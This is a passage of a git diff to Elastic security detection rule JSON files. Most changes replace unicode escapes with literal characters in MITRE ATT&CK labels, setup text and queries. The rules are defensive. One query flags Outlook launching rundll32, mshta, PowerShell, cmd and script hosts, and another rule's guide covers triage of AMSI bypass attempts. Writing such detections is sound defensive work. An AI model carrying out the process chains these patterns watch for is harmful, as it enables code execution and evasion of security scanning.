until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_104.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_104.json index 29f4dd29a2f..597982b6cdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_105.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_105.json index f3134860dba..55f1b4e6586 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_106.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_106.json index a0502e4b5a0..867e6a0d218 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_106.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_2.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_2.json index 46dc0e8cb83..13700f25986 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_2.json +++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_2.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_3.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_3.json index e5551aa2d93..01fbeeb8a1a 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_3.json +++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_3.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_4.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_4.json index 543bec020ae..7b1bc4d6a47 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_4.json +++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_4.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_5.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_5.json index 8fe8d5b9e60..a2b42d7bdb8 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_5.json +++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_5.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Inter-Process Communication via Outlook", - "query": "sequence with maxspan=1m\n[process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n process.name : (\n \"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cmd.exe\", \"regsvr32.exe\", \"cscript.exe\", \"wscript.exe\"\n ) or\n (\n (process.code_signature.trusted == false or process.code_signature.exists == false) and \n (process.Ext.relative_file_creation_time \u003c= 500 or process.Ext.relative_file_name_modify_time \u003c= 500)\n )\n )\n] by process.executable\n[process where host.os.type == \"windows\" and event.action == \"start\" and process.name : \"OUTLOOK.EXE\" and\n process.Ext.effective_parent.name != null] by process.Ext.effective_parent.executable\n", + "query": "sequence with maxspan=1m\n[process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n process.name : (\n \"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cmd.exe\", \"regsvr32.exe\", \"cscript.exe\", \"wscript.exe\"\n ) or\n (\n (process.code_signature.trusted == false or process.code_signature.exists == false) and \n (process.Ext.relative_file_creation_time <= 500 or process.Ext.relative_file_name_modify_time <= 500)\n )\n )\n] by process.executable\n[process where host.os.type == \"windows\" and event.action == \"start\" and process.name : \"OUTLOOK.EXE\" and\n process.Ext.effective_parent.name != null] by process.Ext.effective_parent.executable\n", "references": [ "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/apt29/Archive/CALDERA_DIY/evals/payloads/stepSeventeen_email.ps1" ], @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_104.json b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_104.json index c5a55ac2f9c..c10c3e762e5 100644 --- a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_104.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -92,7 +92,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_105.json b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_105.json index 93c82ecc26d..10706dff3b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_105.json @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_106.json b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_106.json index 2af42a556a2..c252bf650af 100644 --- a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_106.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -92,7 +92,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_1.json b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_1.json index aca5b86bfcd..401724f92cd 100644 --- a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_1.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_2.json b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_2.json index fd80acc6de2..851b97bf18a 100644 --- a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_2.json +++ b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_2.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_1.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_1.json index 185818db86a..a23d00427ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_1.json @@ -51,7 +51,7 @@ ], "risk_score": 21, "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -158,7 +158,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_2.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_2.json index b54e7a89b57..333aa63f6c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_2.json +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_2.json @@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -163,7 +163,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_3.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_3.json index fc854fc78bb..698ea16d05d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_3.json +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_3.json @@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -163,7 +163,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_4.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_4.json index 8db31cabce5..8791ddbfc37 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_4.json +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_4.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -162,7 +162,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_101.json b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_101.json index 837cb1cb027..9f1976e826c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_102.json b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_102.json index 62618d7891d..50c0bfd53d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_1.json b/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_1.json index e8e4fd57ebd..2f711710cd0 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_1.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_101.json b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_101.json index bc8edf82fdb..30ed7bf87e3 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -44,7 +44,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_102.json b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_102.json index e4d3fad717e..2259d9f7325 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -43,7 +43,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_103.json b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_103.json index 6faa41aa8c5..3ffa9c055f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -53,7 +53,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_2.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_2.json index 4a49f8f8972..3193d73cf81 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_2.json +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_2.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User 